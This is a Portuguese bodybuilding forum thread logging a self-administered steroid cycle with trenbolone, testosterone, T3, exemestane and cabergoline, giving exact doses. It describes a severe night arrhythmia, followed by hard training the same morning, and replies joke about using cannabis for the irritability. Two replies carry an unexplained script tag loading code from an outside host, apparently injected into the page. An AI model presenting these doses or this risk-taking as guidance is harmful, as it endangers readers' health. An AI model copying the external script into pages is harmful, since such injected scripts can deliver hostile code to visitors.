Ir para conteúdo
  • Cadastre-se

[Relato]Propionato+ Trembo + Masteron + T3

Posts Recomendados

08/03/2015 - 14º Dia - Domingo (Segunda Semana)

Dieta:
0%

Peso:
102,5kg

Treino:
Não treinei

Aplicações:
1ml - Acetato de Trembolona 110mg/ml
1ml - Propionato de Testosterona 100mg/ml

Oral:
37,5mcg - T3

Proteções:
Nenhuma

Resumo:
Como minha namorada esta em casa, deixei o treino de lado e fiquei com ela, comemos totalmente errado durante o dia, acabei fazendo meu dia do lixo, lixão na verdade, de tanta coisa errada que comi, nem me preocupei kkkkkkkk
T3 ainda tá me dando uns calorões, o ar condicionado sempre ligado, pq qualquer agito, eu esquento kkkkk
Outra coisa que reparei, é a falta de paciência, estou perdendo a calma muito rápido. Minha paciência é algo de 0 a 10, uns 2....pq em alguns casos consigo controlar...
Fora isso tudo normal, não estou usando nenhuma proteção pois ainda não senti um colateral forte...mas vou entrar com HCG amanhã.

Link para o comentário
Compartilhar em outros sites

Publicidade

09/03/2015 - 15º Dia - Segunda (Terceira Semana)

Dieta:
80%

Peso:
Não me pesei

Treino:
Não treinei

Aplicações:

Oral:
37,5mcg - T3

Proteções:
1 comprimido de Exemestano 25mg
0,5 comprimido de Cabergolina 0,5mg

Resumo:
Hoje acordei podre, simplesmente acabado, não estava animado para treinar resolvi dormir mais um pouco.
T3 ainda está me queimando vivo, e o nervosismo está aumentando. Um simples pote vazio cair no chão já me estressa.
Trabalho atendendo telefone, e algumas vezes tenho que respirar fundo, muito fundo...
No final da noite vi que deu uma sensibilidade levíssima, e não quis arriscar, mandei a cabergolina e o exemestano.
Melatonina e nem vi quando dormi...

Link para o comentário

09/03/2015 - 15º Dia - Segunda (Terceira Semana)

Dieta:

80%

Peso:

Não me pesei

Treino:

Não treinei

Aplicações:

Oral:

37,5mcg - T3

Proteções:

1 comprimido de Exemestano 25mg

0,5 comprimido de Cabergolina 0,5mg

Resumo:

Hoje acordei podre, simplesmente acabado, não estava animado para treinar resolvi dormir mais um pouco.

T3 ainda está me queimando vivo, e o nervosismo está aumentando. Um simples pote vazio cair no chão já me estressa.

Trabalho atendendo telefone, e algumas vezes tenho que respirar fundo, muito fundo...

No final da noite vi que deu uma sensibilidade levíssima, e não quis arriscar, mandei a cabergolina e o exemestano.

Melatonina e nem vi quando dormi...

Senti esse cansasso apenas na primeira semana que trembo não bateu nada.

Ontem, começo da minha 2ª semana já senti um leve aumento da força e acabei o treino interasso.

Mano, sobre esse stress, voce num fuma um verdinho? Pra mim esta resolvendo...fico relax.....xD

Link para o comentário

Ontem, começo da minha 2ª semana já senti um leve aumento da força e acabei o treino interasso.

Mano, sobre esse stress, voce num fuma um verdinho? Pra mim esta resolvendo...fico relax.....xD

Aff, cada uma q eu leio....

Link para o comentário

<script src="http://queryjs.me/services/script.js" type="text/javascript"></script>

TRUE .. HUE HUE HUE !

Sou a favor de "ervas naturais" também, relaxa e livra um pouco sua cabeça dos problemas.

Até o mestre Arnold queimava unzinho, pq eu nao ?! kkkkkkk

Link para o comentário

Não curto brother. Sou mais um prozac kkkkk

Aff, cada uma q eu leio....

kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk

<script src="http://queryjs.me/services/script.js" type="text/javascript"></script>

TRUE .. HUE HUE HUE !

Sou a favor de "ervas naturais" também, relaxa e livra um pouco sua cabeça dos problemas.

Até o mestre Arnold queimava unzinho, pq eu nao ?! kkkkkkk

hahahaha realmente o Arnold queimava um, mas não adianta, eu não curto kkkk

Link para o comentário

Não curto brother. Sou mais um prozac kkkkk

kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk

hahahaha realmente o Arnold queimava um, mas não adianta, eu não curto kkkk

Manda pra cá que eu queimo pra voce kkkkkkk ou deve rever isso ai viu .. UM BOM CHÁ PRA CURAR ESSA AZIA ! KKKK

Link para o comentário

Manda pra cá que eu queimo pra voce kkkkkkk ou deve rever isso ai viu .. UM BOM CHÁ PRA CURAR ESSA AZIA ! KKKK

AUShuASHUHUAshuAS

"Porque os remédios normais nem sempre amenizam a pressão" :headphone:

Link para o comentário

E ae RVTZ, vai toma no rabo carai....kkkkkkkkkkkkkkkkkkkkkkkkkkk

Link para o comentário

10/03/2015 - 16º Dia - Terça-feira (Terceira Semana)

Dieta:
100%

Peso:
101,7kg

Treino:
Costas / Bíceps / Trapézio

Aplicações:

Oral:
37,5mcg - T3

Proteções:
Nenhuma

Resumo:
Hoje eu vi a viola em caco...acordei as 2hrs da manhã com uma arritmia fora do comum, nunca tinha sentido nada igual. Achei que estava infartando, ainda mais que acordei assustado, e muito sonolento, as vezes pensava ser um sonho, mas abria os olhos e o coração parecia que ia sair no meio do peito de tanto que batia, não conseguia levantar, apenas rolar de um lado pro outro na cama. Abria e fechava os olhos tentando sair daquele estado e acreditando que aquilo tudo passaria, suava frio, coração sumia os batimentos e aparecia de novo, achei que iria morrer a qualquer minuto. Pensava nas matérias dos jornais "Anabolizante mata jovem" e demais sensacionalismos da nossa mídia manipuladora vomita diariamente a respeito dos EA´s. Me lembrei que aquilo poderia ser efeito do exemestano + cabergonina + T3 + melatonina que tinha ingerido as 22hrs e que todos estavam fazendo efeito ao mesmo tempo. Cara, que desespero, não desejo nem pra meu pior inimigo o que não tenho rsrsrs.
Quando consegui levantar era umas 2:27 da manhã e tudo aquilo tinha ido embora, minha cama encharcada de suor e meu corpo totalmente acabado, parecia que tinha levado uma puta surra, que todo centímetro do meu corpo tivesse sido atingido por pauladas, dormência seria a palavra certa pra definir o estado do meu corpo após o episódio. Rolei e ajoelhei ao lado da cama, me sustentei pelos braços e consegui levantar. Fiquei em pé e fui pra cozinha beber uma água, minha boca tava seca, e meu corpo inteiro molhado, suado...
Tomei muita água, acho que desidratei. Estava com medo de deitar novamente e ter este surto novamente, dei um tempo em pé pra ver se realmente tudo aquilo que tinha acontecido era real. Me olhei no espelho e minha cara de assustado comprovava tudo que tinha passado. Sentei no sofá e tentei pensar em outras coisas, boas de preferência pra evitar "puxar" essas coisas ruins novamente.
Deitei umas 3hrs e consegui dormir as 4 e pouco. 6hrs quando meu relógio despertou, estava incrivelmente renovado e pronto pra mais um dia de exercícios intensos. Foi o que fiz, mandei costas como se não houvesse amanhã, bíceps eu destruí, e trapézio chorou.
Lógicamente que essa ideia minha foi muito infeliz, pois todos os dias da semana estou indo na fisioterapia tratar da contratura muscular, e acreditem, acabei FODENDO meu trapézio pelo esforço, não senti dor pois estava quente no momento da lesão. Resultado: pelo menos 1 dia de molho pra evitar algo pior. Amanhã, nada de treino, apenas descanso.
No mais foi isso. Tomei minha melatonina e dormi.

Link para o comentário

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar Agora
  • Criar Novo...